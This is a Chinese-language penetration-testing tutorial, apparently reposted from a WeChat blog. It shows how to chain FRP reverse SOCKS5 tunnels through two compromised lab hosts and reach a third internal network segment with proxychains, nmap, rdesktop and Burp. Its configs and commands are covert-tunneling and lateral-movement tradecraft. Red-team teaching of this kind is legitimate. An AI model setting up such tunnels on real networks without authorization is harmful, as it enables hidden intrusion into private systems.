FRP通过Socks5二层代理,访问内网三层网站

admin
admin
admin
102291
文章
87
评论
2023年4月24日08:00:34评论171 views字数 2381阅读7分56秒阅读模式

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

宝子们现在只对常读和星标的公众号才展示大图推送,建议大家把李白你好设为星标”,否则可能就看不到了啦!今天咱们来学习一哈内网渗透代理利器FRP的使用。


昨天晚上星球内部直播正好讲到内网代理这一块课程中用到的是NPS+Proxifier搭建socks5进行内网穿透,这篇文章讲的是另一个代理工具FRP的用法。文章底部扫码加入星球,有不定时的内部直播课。

FRP通过Socks5二层代理,访问内网三层网站

0x01 背景介绍

FRP通过Socks5二层代理,访问内网三层网站


假设:已经获取边界服务器(192.168.0.100)的服务器权限,win7服务器(192.168.52.30)的权限

实现:


配置一层代理,访问192.168.52.0/24网段,以便访问第二层网络(192.168.52.30)

配置二层代理,访问192.168.93.0/24网段,以便访问第三层网络(192.168.93.30)

现在 ubuntu(web1)要充当frp客户端和frp服务端,以便访问第三层网络

FRP通过Socks5二层代理,访问内网三层网站

0x02 FRP一级代理(反向)

端(server)

kali(192.168.0.107)

frps.ini--------------------------------------[common]#服务端监听端口,默认7000。监听来自客户端的流量请求bind_port = 7000--------------------------------------启动chmod +777 frps./frps -c ./frps.ini

FRP通过Socks5二层代理,访问内网三层网站

客户端 (client)

ubuntu-web1(192.168.0.100)

会将客户端中所有的流量通过本地的一个随机端口转发给vps的7000端口,我们访问vps的7777端口就相当于访问客户端的7000端口frpc.ini---------------------[common]server_addr = 192.168.0.107server_port = 7000
[plugin_socks]type = tcpremote_port = 7777plugin = socks5----------------------启动chmod +777 frpcnohup ./frpc -c ./frpc.ini >/dev/null 2>&1 &

FRP通过Socks5二层代理,访问内网三层网站

先启动服务器,在启动客户端

0x03 FRP二级代理

同时启动二层代理的服务端frps

ubuntu-web1(192.168.0.100)

frps.ini--------------------------------------[common]#服务端监听端口,默认7000。监听来自客户端的流量请求bind_addr = 192.168.52.10bind_port = 7000--------------------------------------启动chmod +777 frps./frps -c ./frps.ini

FRP通过Socks5二层代理,访问内网三层网站

客户端 (client)

web-pc1(192.168.52.30)

会将客户端中所有的流量通过本地的一个随机端口转发给vps的7000端口,我们访问vps的7777端口就相当于访问客户端的7000端口frpc.ini---------------------[common]server_addr = 192.168.52.10server_port = 7000
[plugin_socks]type = tcpremote_port = 7777plugin = socks5----------------------启动chmod +777 frpcnohup ./frpc -c ./frpc.ini >/dev/null 2>&1 &

FRP通过Socks5二层代理,访问内网三层网站


0x04 测试连接

kali本地添加proxy配置

vim /etc/proxychains4.conf ----------------------------------socks5  192.168.0.107 7777socks5 192.168.52.10 7777----------------------------------

FRP通过Socks5二层代理,访问内网三层网站

第一步 通过代理,使用nmap进行扫描

扫描二层网络proxychains nmap -Pn -sT -sV -F -O 192.168.52.30 

FRP通过Socks5二层代理,访问内网三层网站

扫描三层网络 proxychains nmap -Pn -sT -sV -F -O 192.168.93.40

FRP通过Socks5二层代理,访问内网三层网站

第二步 远程连接

proxychains rdesktop 192.168.52.30

FRP通过Socks5二层代理,访问内网三层网站

proxychains rdesktop 192.168.93.40

FRP通过Socks5二层代理,访问内网三层网站

第三步 浏览器开启代理,访问内网系统

访问二层网络socks5 127.0.0.1 7777http://192.168.52.30:8080/

FRP通过Socks5二层代理,访问内网三层网站

FRP通过Socks5二层代理,访问内网三层网站

访问三层网络启动burp:proxychains  burpsuitefirfox代理:socks5 127.0.0.1 7777http  127.0.0.1 8080访问网站:http://192.168.52.30:8080/127.0.0.1:7777--firxfox:8080---192.168.52.10:7777---burp127.0.0.0:8080----发送

使用代理启动burp

FRP通过Socks5二层代理,访问内网三层网站

浏览器开启burp代理

FRP通过Socks5二层代理,访问内网三层网站

FRP通过Socks5二层代理,访问内网三层网站

FRP通过Socks5二层代理,访问内网三层网站

查看后台burp的代理包

FRP通过Socks5二层代理,访问内网三层网站

0x05 链接获取

文章来源:CSND(星球守护者)

原文链接:https://blog.csdn.net/qq_41901122/article/details/127190123

0x06 往期精彩

FRP通过Socks5二层代理,访问内网三层网站

红队小工具—迅速定位多网卡主机,找域控


FRP通过Socks5二层代理,访问内网三层网站

某攻防演练绝处逢生


FRP通过Socks5二层代理,访问内网三层网站

原文始发于微信公众号(李白你好):FRP通过Socks5二层代理,访问内网三层网站

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年4月24日08:00:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   FRP通过Socks5二层代理,访问内网三层网站http://cn-sec.com/archives/1687822.html

发表评论

匿名网友 填写信息